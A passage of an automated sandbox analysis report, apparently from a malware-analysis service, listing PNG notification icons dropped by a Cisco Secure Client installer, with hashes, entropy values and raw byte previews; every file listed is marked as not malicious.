                                                                                                                                      Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx..}.t....*...KT .J.(..U".T.`.*.+.U.D...`.....G....V[.&.....m.*JX7...A.>..G....^4....8..g....=..I.[...9gf.|...c......+\.>..8^E.M=..O....w|.U......'..5G.A...].......h.......7'.....3=9.Uk.Hi..9Q.9o.E.^..F.^.......+I.......8W.E....w..~...&..?.............7..-..FAO.S.......>.A..:.....d.Z.(.=.{Qy!.Fz....q.N.p..+.....\DFp.c...x.y.....u.7.&................kg..{.g.../...EL .......E..-...#.#.....f$g.v"........Igup..E.,b:f..Lv..#/&..oM.l..G..z^Q.<...f.^]{.[.g...q.X...._.....s.d..(0"..<...V.8q....CM..N....yb...{.i....d....Q....c...{.z...x..D.Mi....<'...#c....G..F.......CM).9.*'...n...Y...zz..q..l.;.j.w...!.F..'&........!z\s._.j..u.Q...].k+...(...R'.H..B....(x.R'.H...-.N.8....|_...!.Ks.>9.yf.^@..P.O..../..^..#.j/.......w....c?op.C2q..:...$#=A.n]..i..y.'....tR.D...5...T.DO.#..U...}"|\..S.qH... .H[..<..]..V...u(.0O:2.X. .....>.S\.?.$...Ez.....$..<.. .=..paR.|...8..T....]......./...IY.......O

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\toast_nac_info.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):10710
                                                                                                                                      Entropy (8bit):7.9641316394298025
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Aowo3FbryCXdxyG2En+b5eUJf1Q6pPZ3LxElBt/wVUuv04YKmECa:AowqbrvX3h1+b5eMdQDY3v0da
                                                                                                                                      MD5:5412237E7D26A5CB2F3F8891B9E36462
                                                                                                                                      SHA1:778ABA750AFD4D5518A5B7EDE1F73E7A016883C8
                                                                                                                                      SHA-256:288C513CA8875B4BC5DB6144D0C4215680F5BF3385DF05D6A8EC2896587DB6D3
                                                                                                                                      SHA-512:BAC0482951830571BDAF8A1FF0C23B3EB1C6AFB72C46628150EAEE2CD99167FEBE9A74DCAA2F2DAEDA5B58856BA7A9378880A7EB0B5D834D31EA91D3010B41F8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............._......pHYs...#...#.x.?v.. .IDATx..]{..U._<..Th.CK=..R..V.GOWH.G3"8.5L.....;b............3.:S....s=....G].vX.w....W....Z?.^{..k..{.........w}...%y`...]...B6..........K.S..j.G."..?>.c..~../(/&}................p..B~..7...t.\... .j......,.......;.]M......`.o.p..?...98.c.%.6.....g...&.............;..F..!.fL%/.j@:.`.o....5_.b2...5|h...UoI/....W..W...}.....<.<\0.p.N.,Y......M...KI.O"C.x.}$.....=.V...E.........HT....Ep.m.~.[(....Y.f.'g*_...NG..S....m.2.<..[.(G.m..[.1....S........|...[.o.#eW....F.-.a.+...^.Rp...L.ue.<+./.......?..Lke.b.r.....V..G...$..6.]:.s...+..F...#O....=Y.;..g..l..,c....DWw.hB....B..l...`..;".wV.#..{.q.........v.].Z..C...T.`.-}M#...........{.(t.E.Om. ..=My..V...4.\.Ep.........W.)..x.W..f..7{.IG..-.....Z..{.l..F.,..f^r...V.9..H../.....$.&>..U...Msx.68.....S{...Z....v..v....O,.ps2E.......>..M_.........6H.hl.;Q.d....h.H...V..W...iH..{..2Q.zmp..;.Z~].c.!.Y.}.6.P......^kC..t...V.0.^.l.NMp..o..Y.8...Q

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\toast_nam_attention.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12252
                                                                                                                                      Entropy (8bit):7.977665916091742
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:wld0FFxadXOHqBRtSDkAW0C6j7dNirKFbu+MMIxh0kOeg+Y/meTYeJlJlFrQ/:2oFxTqvt4TW56j7uraNw70kkHd/Jnk
                                                                                                                                      MD5:864800C5743CB649C4616758EA169E4F
                                                                                                                                      SHA1:3A02818977AF60D5DA37011CFC35DF11FC467906
                                                                                                                                      SHA-256:EF07FC7A9E194C9F076CF86C65E292816AAF666C00400A0BE8F70FB7740E902B
                                                                                                                                      SHA-512:ADE99880BB1B1A1FE3ED348AD625D6301FE8631E594E1CCBBE8678245F5B1EE2BBF93BEF7101698CF909E93CD4BBF005DD20466D3A278A9CACE91B324A23A48B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x.....&......!.O....Z.(.....[p....w...X.Hp.uKp...&.+V.....A/.S[.l.....j.}...b$...M..gf.9..;7......;3g......)WH.]...*.>.y..t......6.O'N..8.#.v<..Kv........y....;q.....(..mG..8]..G...]...."l>........vd.C.....nHp...v!....Ks^?I.T..1%.U..s/...+.I.{Yv.2."/...`.p.........1?8L."lDo.e...O/..~..[..o..>. .o....-.=.]h.g.Y.......F.4g..../..x.......C.?..#...%.2...PNz...............-...i..8}.e?.......]~... *.......t..l...FD.g`........3g\I.,ZD.7.+.....:7.6....J.T*.?.f".....8.X.:2.j?......LK..G....h..l[...v|...9.[p.6.<....$....\...^.o....Ti../.{.HQ.ID...o.jl.A..(......./...".6.'..V.....T....~...I....,t..Hh.zT.G...njG&...7.MIE.g....../S...i,..Z..D*.D._..H. ..3......Y.*.2...O.........&.......)?...%.c.........eG.o..I,.N....wI..[:......./..+B..$..]l._..T..2<....;.v.~5t.I/..?..=..&.....U....L...L.....|...0...w.....V....*-.x.D..8...K/.d)......kj."......g*wo}\V.Q..8.).....?'..wP..?5A....K.1?8...e.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\toast_nam_error.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12258
                                                                                                                                      Entropy (8bit):7.976396258951981
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Fkocto5a0L5W0WyUW8l4JGfcRWyryRN77YK/CPEyei5rTiKb9bdgih7OnT:Fkocto5zW0dNaAfRxKK80dbd5hanT
                                                                                                                                      MD5:33B3721B931071C69A9ECDFDAEF39F29
                                                                                                                                      SHA1:EE4DD7077CFDA9C0A2FE594CE8C9496EF23CA2E3
                                                                                                                                      SHA-256:55FC14B826D7F3C9F47F14CDBDAE488F1D4FE3678CD95BBBF7E643436F382D37
                                                                                                                                      SHA-512:B8E1843F2F08ADF93F7277FFAF8DD5299F7F5FCFA38AD15EC54422D4E3048822E15BB9D0B682D1728B6E4064CAE32222998ED48D41310FE7D9C58116D6D9E108
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x.....Q?.....!.._..t]..$.*`W@..Z.......]..h..B.n...j/.R.~..P`..+*A..-J...o..u....9..3s...7....+y.3.<.<..%....5.....Sv.o?9p.....=..t....~./,]ID.>....O.p9.T.6.I/*.......s'O...}.....QkS].y36."..P.../f...E..Y....n.h.K.uN2..*zn.....M...Y.n?.....V(G......o6.....n.G6........O~ai...hn+....s..3...3...........X0.t..o....Gr.w...../{.l....3"..d#s..]..S^...x.7\.xtk7.k....f..8.....MMM.......At...'.t1......c}...k.....U....b]dW.=.k.=.o..a...o....v &T....-j....q.o.5=....w.2.v.&U.37F..WG...vn....l......S...g`'./.|Z....lSP.....ji...N.<..6f.u^.v..l;)F...$.....E81..F7.i..h.+.2~3.SBD..w.q/...z+.?..........^.S.(.3f..N.......km..v....#.H7..S&0J/._XZ@D...t2a.........tD..#..]"s...J....|M....?..tLH....&.8.|t.H.\/..O|C....":..E)Q.R.....<?...M.}............1..3.....]5.w+....W.>7. .j..>..,b8..c..v.E..........;.\.:];.I.S..CE...c..._...........r./e..C...t..7.yLJ..{_.z........W<E;f^g....O2..>|.n...o..7Q.d.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\toast_nam_info.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8950
                                                                                                                                      Entropy (8bit):7.969730039207073
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:p96ObyGv4LCovtazAkU/bm8oT+4UObs9KhHU1gL3c2/Rqw:tbtuCovtazCDdxObJ5UM3hh
                                                                                                                                      MD5:4F8EBA018E164B7A5FFDA205576989E8
                                                                                                                                      SHA1:56669FFFC614C2577370B0EF84EA6EA4FFE89858
                                                                                                                                      SHA-256:815EACDBC62FED323EB3D0BBAD4596C0D699862A66258A4F994B78CE520389A1
                                                                                                                                      SHA-512:F9CBDEE29FD372DEA72C6039E705A192B2C751927490B811317CE74A56DBEF1B4C17D05D1CC29A32F060C6A761D93CDB5D2AF6C76853427F5341D7C6DA4F44E7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............5..6....pHYs...#...#.x.?v.. .IDATx....]E......m..Z.o....AZ.n(>V.")1.-F.....m...l...b\.@....E..|....*..'%.RA)...+.e.}.%..T6....3sf.s.s....{.;.7..7..)..i..i...~...?L.v....o.h..|..@<..vR.....ILO ...N..<'a.N......N..bs..!..<,c...}b..U]...../.L...=Enx......V.3.}r.)o.u..|...+g.Hu.*.....k..[.$&z...G#o....o.W.`w.T.5..~=..........V..;..$`.......=zf..Di_....D...r......W].}":..w|...=.._.s.2`r.8!.l.|o.......;hzy..n.s.0..+?3l>....Q5=..:6....L.<.l..x.......{.O.mx..R..i..$...\....#..^7Q.>C..........$..`.=...*...~....oc.e?._q......c}.......G.'.=....<..!X5.....=.8........N@..1c.Q.....5.A.]...)....t7B.......=.V...vn...cGNbr...s.1w...g[....e.6U..{..\...N"......0:....WirR.IL.d...JQ..9.....^/.......Gb/>...z...M-..2......(1. ..$.g..Y..'N... .-)...2...S.M.%......$;.X..R..C..m.m'.|wK...4[..`.....!..o.....,..u..4...._}.....l.O...3.mn..Y..m..M..Q.9..Y...N...!K.?.D..........!....x{d..=...T4.i.M.;.NGf...^.s.....T_&.%...7..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\toast_umbrella_attention.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12436
                                                                                                                                      Entropy (8bit):7.977312501768235
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:9duiLviw1Tg2WOFeuMhEhKPewOSJKVBpFGo5cJUs1P3X3cI78saDjy6Z7KiasZM1:7vJ0OYhbPWEKLaoe9dXsI789HZTla
                                                                                                                                      MD5:3F1083A6458C2CC3E9743D03ACB0D349
                                                                                                                                      SHA1:280DA65E961DAC251D6394A234E92FB110DBC998
                                                                                                                                      SHA-256:78A87D7B4CDA2E04CF4A608C78CE627450E15CD75AE121B4D72466837197D096
                                                                                                                                      SHA-512:250604CE42BD866B870A50B01E892036364DBBBEA1AC58EF60B3E4E38513A9DADE3987459FBD83681435D74521B368550DFE329E70CDD84837BAFCD2E43B53A2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.xV...c....../\..T..@.....T.`.d....H.H..^F.@...!.X.x.PqP..{4...4.F.I.......2....".?...f......._...?.u.....}$,$..._TZH.9H..q....5...[.[T.#=.=..._...s..R.0Or..5eCl...g..e7.+z?eE........6.~.";.y....W.(?...Wf:P..gI.<b.Lr..Qd..........\.A......t.`,._...u...`/.........!.{...T./...........+....>C......8.....[.. ...WNQ~.;v..3...b5.l...*\~....+R....+.. ........`..........{;v.|Ry..x..UQ.&..%..$....>s......../..2..\T..Y..G#......x....W\.DT[.....v},]I.Vr.m.....x.......1.cu.D...bO:...6...,[\)=....,o..o.a.(.".....&.D.......=x..*.P&.........".}z+/_..X`etu..J......1....A..;...B...{.....M./Vb....v.T.a..3.....k.....T..JC.u....`.[..(R..........{..4R...B.8...vE...}w5...[.....F...3pTU{k.Bz.L....-T...T..?......|Py0..&.J.|...........{"..3pT.V.r...PH..R..M5V..AB.8...R..A.\......(3.p;..\.h.m....p..Q..'ok...O.6.$.....g...J...0...?O.~[[.),,4..N.......M.....cb.jT.JU.e..........1..({DW....K.*,=..!..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\toast_umbrella_error.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12780
                                                                                                                                      Entropy (8bit):7.975972884511595
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:eS01CYt7F9/5i2XPFK02VBVDNP/RqOMGkw9j:e1th95PqjP/E1A
                                                                                                                                      MD5:1CE2626120CD6B69683255C71552896B
                                                                                                                                      SHA1:4230DF12A00E6B13CAB39EFB1C44DCBF5B656087
                                                                                                                                      SHA-256:B55ABBF6754B131C33947DCA3511D219B2AB2DC5D7E8945BF3C6A2E9FB0FEB23
                                                                                                                                      SHA-512:A197A76FB7DB9FEF68E3A49DE4C134EFB41472773F323BF4F8AB3B610174FD75C15848BB42CFC2D4240D72EFA66FF4CFFE02DDA28323279C87C7019E167F724B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.tT..7>rk.....I...R.....6D../...T@..._.A[..$rkA.D..U0......W.EI..(...^.TC.TX>...eD......>{.>g...d~k.Jf....;....G.BB.<y..#N.6.i}......#.~......G.~......s..~...5..V...N......'.=..$.........K..a{.c.........:...3.....:.L...KWu.{.._..../<.Z...n.y..../.e{.i.3.......[.O`|..h.+../........M#._....s..G.3hO....j.._&..?...s=.<._\~I/..9....W..I.....u.tq..}..7.G;....h........f.G.v.h<....c...7.0.1....d[...^.......D"1....[.ilC..=@.6.U.O0.......P.......D.t..K..}.6M._*.....6._:h.'.Ix.htP..l.N.4.........$.m.......:........+..o<.../Ly]..p.....+...y.._.........t..........7..g...D..Y..A.........n.....9.....D."j.9....>]p.ly...........N.<....IaT..N'S..'..4.Nd.ntN........;..<d;..^..:...0...m.?).....Q..X.`).......%....!...........'..'...M2M.?..D..3{_[....jdpY.tW.i.....5Wep......Jj7....IJ....g.?M..).\}Bkc]....~u...~...w......!.x..w.......;)~NL...L.;wN............\j.[.N.Dt...EB.c:.....b..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\toast_umbrella_info.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):9482
                                                                                                                                      Entropy (8bit):7.969513879342907
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:LXNXFLy+vMbgQbCoVANBzT84c2blwwjla7:rNX5ggQOoVIzwHwxA
                                                                                                                                      MD5:21841588532E34397E478E791A064F2C
                                                                                                                                      SHA1:90C0BEAC3D3A1288FB7BED658835BB6710E67922
                                                                                                                                      SHA-256:9D0F626E21D3324BE7CB473D44514737D9A9145B86E73F67EBFD6DE308B36FCC
                                                                                                                                      SHA-512:B0006DD98C201AD06F79166FD53F67C61C60C48C1506153EA47AB7F38A7D4F6CCACDF9E369AC0EFAD36B396786EDFD1FBEF8302D1F2B1F82BE6D784936ED6CB0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............5..6....pHYs...#...#.x.?v.. .IDATx..ml]......$..B.^..R.BI.mPB..i..B.I.D*.B...i...b7M...B...TI.CU..K..*.6%.\.5...T.....B.iU....U...x.d..y=g.9...dp..{.s.y^.y!e.1....z..BN...........[.~..X......Q.PO.w.!......k.d.M........x....y....<....O.oe.o."<...d..f.&2..".....(..{..}..C....]y..).xq.]...7....M....{......:'..'^.......9..0.._..~....#3.^M.t.0.....................\v].3.b.....ONz{.._..........m_..\..5W.buE...q..>...xE.+qA{E>^._.....f(...p5..s.fgI............_.z./.+V.>N.....D..). .q..9..!..9#..-(...^...G...].E.l.>..2...o..t/"C...x.\........u/ S|R..)-WMK..1..\..{..&..w..V.^...U8_A(l...Jp.....y.#..b{5:...F0-..N.c..ne..5....&.Kf(j7O....../0..N.[K.#Q|.K..cfjb;..N.....8.{....n#.j.O...Z._;.m.jWfp~.............. .w.}.<....\1X?+..4bi]..H)../.".....f.&N^......8..S..]...3..Cn..z]l.,........_...ek.e.F.-w?....i..i.B&./..........>.|r...Ii!....Q...t2._..HHCBx..B...<?35.J.....V/..s-...[..k..V.v.a.50..teS..w`fjbm....qC.....;89+!/@.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\toast_vpn_attention.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):11747
                                                                                                                                      Entropy (8bit):7.9792800328394184
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:6O6eUrSbvYvQ77S7PmrQJhWxQLVBinCEBWLp41ZvPaiTlShB9R022uRx1ohfiq:67RSbAvQyCED4QLVBiCLLS1hhMv022u6
                                                                                                                                      MD5:49E51BACF675B9DF74CD84F600645F0F
                                                                                                                                      SHA1:563FBED61D83375EE51DD85FD7DC71B53D048ADF
                                                                                                                                      SHA-256:25EA8BC480B6E97548BD3F64ED6128686C06CAFAA772025B24C2F52CE39B137A
                                                                                                                                      SHA-512:3231ED2D95E3B2DD1AF2956D3FB29EC7D6AC2D8A5FA6CF12DDA967BCA25CBB3D69B393265B38592B8DB62CC93D55903BE827BD5AC5E119DB5D80E2CE54DDA084
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx...x......._...*.<Ih.^.....s.......D....[.....H..*..z).J..j}&...P.B..l..NBD| ' ..r.&3..={...9....Kr^3s.^..^{= ..............M...v.{.l._...e~...H>.4}...w.gpq...>...$..C8k3\.....>.9.. x...g......R..u...~.y..i..F....<.i......b..r.4..j.d..Id..7\Q4Z....H..=.5.....7..A.*X_.~-V.n.8..J.X/...jK..ZX.\.00N.(=p...zA...L}.~......fN.{.L2...e........x.s..t.......-.5..{M.i..#3g........; q..!#{....... }....t....1..N.....1.r.....h..or.".q.8...t..'..&yL..9..M.d....k....c.j.DO...]x5V.6#4SX:..R#n..f...S....sg.7..~5q.`....y.....9...d.o.xL".`..r"..&.3F...B!..B.......).U./...?..... .....7mAZQ.j..z..p$.o.v.=.@\.$.Vh...b.........\.y....:.d.5.9.R>.9.y..q"....4@.*.{.Qi.J.[...........W.6G..4BO..E8j..a.t. ...............o..%...w.+Rqb..PFGkt..)..z.c.B..+;+.7L......V......0.....*:.[.@.E. ...W ....Go8..U.<&..G!8A.@.hY...4Ifj...Z8..+.U.'..F.ea..-Y.Q.,.w.......dA$".>F.Z.VP[.h].B.R..NU...:P....z...<....G.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\toast_vpn_error.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12124
                                                                                                                                      Entropy (8bit):7.978101118980993
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:6QcIfCBldrUhS+mzFAXOk03y4nRFoVKX22ZSsnVqzY5oarRl75w1/i5IxehvNbim:6QcRBld2S+m5AOTRaI22ZSgVq053t5ww
                                                                                                                                      MD5:5B846635AC3DA9C8E857C042ED0EA2F6
                                                                                                                                      SHA1:B439FC64436B74900F453ED2480C8CA547CBCDCC
                                                                                                                                      SHA-256:9C6135A6176AC9D00E1BD4307A3111BBECD39814DB18212DA1D55916A4EEDB4F
                                                                                                                                      SHA-512:0A58ED5105CFB87DD3F91675734171989C0A36B572BA2D20706CC831E0DAD9DB37175754E405680B4DEE4D6D958DA63B89413E2B6D2725A84C95932F8D123323
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx...|....O..ZY.Z..!XT* ..,.%...n.R...R.,..)....Vy+..[+..DmA.l).&i.Xi!.XwB.....c....o.;...;..<.L2....<.l..{.9..s(.d..#3;....5...}....]#i.On.....F..G,O&}.]..m.l..rN.k.Jm}Me[...n........Lwe:...f.}`.k7]8......D........v.'(....t.E...^.v......n.....HO";.{.l.2...DX.6._.../.'.=.'9.#....9=... .z....-.>p..~..G......:H..=v...SV.....>..K...w....PYI.....G.mx+2;]az...|...>{...............m.j.*..'x.........n......q..T.9.ew........j'...W..D....-......6)....N2k.,z...+......0..z.x.......z.&./..?..;.0;..+....7Zg.w...B.Y*..qD.....9..G.......9~........S...O..._TTT...Qy\[.(..#c.k*......<..]k.^.c.Lv".5H... e...D./N'.E..tJ....TO.L?A......'..n...*/.....).vwA.bgRS..m.....+.m]~P'8.m.......p.t..a.=....Y.I...$..nO..$....~......m.7..........P.$g.......#.a.>c......;...Y...\.|7.]...S.z..C....=..c.f.2{\..g.h8..v@(....4.....e..fj..Q..{.E.'..../j?|.v..]s...R.......:..;.t.8....'.....x5..#...C..djj..U...8...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\toast_vpn_info.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8594
                                                                                                                                      Entropy (8bit):7.973082494080156
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:IhgOYUbtU91yZQm0IZ5GE1njVNMooVREvukNGEsuiaoYOyF40:IhaUpU91ScIZ5PjVNaREvpjiao4+0
                                                                                                                                      MD5:D1F876BC1C789A4108570185251B864E
                                                                                                                                      SHA1:9F91D3B837191A9499CD2959EC1802CF444D78AE
                                                                                                                                      SHA-256:DF137D0086B1A5DC1A0508643AB8DBE66A0A268A2A5E7A539EDF39F6957AF1AB
                                                                                                                                      SHA-512:4E1D5AE2D6539B38EDEFEC017B41DD50D7EA41AEF9B6783538D8D19D9C14E2D9411D2DF86AC672BD6B171A507F77EF2D4976003206DC4624687BA4588BAA6688
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............._......pHYs...#...#.x.?v.. .IDATx....U..G!o.<.........Mi@...t+iV@[H.X..-MZ...6E.lZ...X.>%jW..&..]-P.JV.<..Z...Rt..@M.mM7...9sg..;s.{....s.3....o~.H...w.......-...-.<.......4.5.y..d'....7......b..{.....]7..?u......}5y...M.k...`..U.w.............>.}...h..s.... ....Gu!....[tc ;....F...v...k.{.x.'U..;..-..'...B.Y....I...R..0Zw...`u.C...|].....m...y...V.I..?.L.;.8.....Ez&\h.'y.........;...-...G.y/9*....}...S.@..+._..*..a.9WZ...._W+-.B.>.m..:....o..*\...<Mu`.a.........o..w.]@=/_|9Y..~....b...>.dk..4VY...5...v+r"...qw....sm..&.]."y.x..I...kt!fw..Xx.....\.,}.=.gH..AgA..xV.\t..".0.(...8a\.QJ..k..Hu.*.........E..l/...4=x.54l..$j.k3M.../.l|r.=...K.Rt.Z..........N....v...z..S...1^..u...P..j.BF.W...iH.....n).....=.s8...!bx.N<.\]....,.6..`..b~8...[..X..o..R.X.`!BiZ.0...t.im..o....n...s...|W..<....K.by..o..l......{.KMe.....g.n5..b+w.B.Ilo...M?.V:X...!..&.KJ...?...Lj......._.~...l.}...=..HO.@?!d_.O.Vy.....QI=..b4...8t

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\toast_ws_attention.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4117
                                                                                                                                      Entropy (8bit):7.943813748161345
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:79m160UrZetyDZrcRzRB+6nB49EkDPzkWb9PhkqjhqBx1DNo:79G6xr6yVrkzRB+UkEWb9pji1DNo
                                                                                                                                      MD5:04127248AAA5B7D32DC2DE4F02DA025F
                                                                                                                                      SHA1:6509E437F6503A9975953B955054D29ACE439D5F
                                                                                                                                      SHA-256:946B8C23BF05558B52D273502A65731A5E412C9E02A544748C5E5C27A3ED6D0D
                                                                                                                                      SHA-512:F26907895DAAEEE025FB20BCD22803F1151A5D5037B85FF1DCD71DA98E78C417996C08759F646D8E463FB6DD43A36F10092746D6520F9C70BE4AC03AF3B5F48A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...0...0.....W.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Z.l..u~s........)..(.,KQd.Ih...D5.q..(..@."6..E[.P...r.F..5..H..@Z'h....(:...P4.S..]..=..{..R.D.....@.;...w|.{..............@.DW.8........`.@/.!.N....o..r..D.\..]..? .";U_U...R../q.b.e.e..%-S..J..._1.....0...P(.....!........U.......kg.6...-....^.m...8.....E..3E.r}...._..fg&..............f1.....B.u\.g....zz.w...NWoc.... ...m.....9Z.'.....l..a.L..?.KX?>?V.:84X.../..7...._....#..zT.~.{wu..B......VI.l...e..F^.l...Hy...1..4...[.p......S....j./.t.0..c..O..Z6wGiw'..h........8..`w.g.5.Q..&*.Gxd...@3,..z...8.T...,..VAP$(.tm... .. ......*....\.`.Q.hQ.I\v.].....N..............}...@...%...........x.x.DU.e$..*m.5%..(.A".X.d@r...d.l....:.B..Q..U.H.5....X...k.'...p.>.ZCWo..{...j.2...[....Fg...0.\T...4d.'....%H.....@.k-...4!.+..B..Obr.=948..BgK5?..;Sv`.....)\d........u..}.pw..G.s.TV..R.<.7S......0}.......h.9..*.NG... W4..<*.!..>.U....;c.>..Z.sR..<w......I.....G:.>..#"...%...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\toast_ws_error.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4267
                                                                                                                                      Entropy (8bit):7.94257084168463
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:IqGbLvTlphRGJSqAeFg590km/kqzrxsoCeaV6XjNfUmhPRD3el9:ILhKFZa0PCPiNfU2RCL
                                                                                                                                      MD5:7014A8C17D7E8E5A2BEDB4C4E0C12E80
                                                                                                                                      SHA1:28881EE38814E155FA7B1E0096801A644CAB6548
                                                                                                                                      SHA-256:BD9514FA182DE90450B6E6E3EEDB2E084CD1390D5B6FDF0509B81EC36B963147
                                                                                                                                      SHA-512:B2B94E806A4F1F8BACAA2870944C75952A9C9F0577AF6571BFF65038DCD242AF5B887E400430E8E8B0B8E8BD2BA7A7318247581304C668662A7A6A255F142A12
                                                                                                                                      Malicious:false
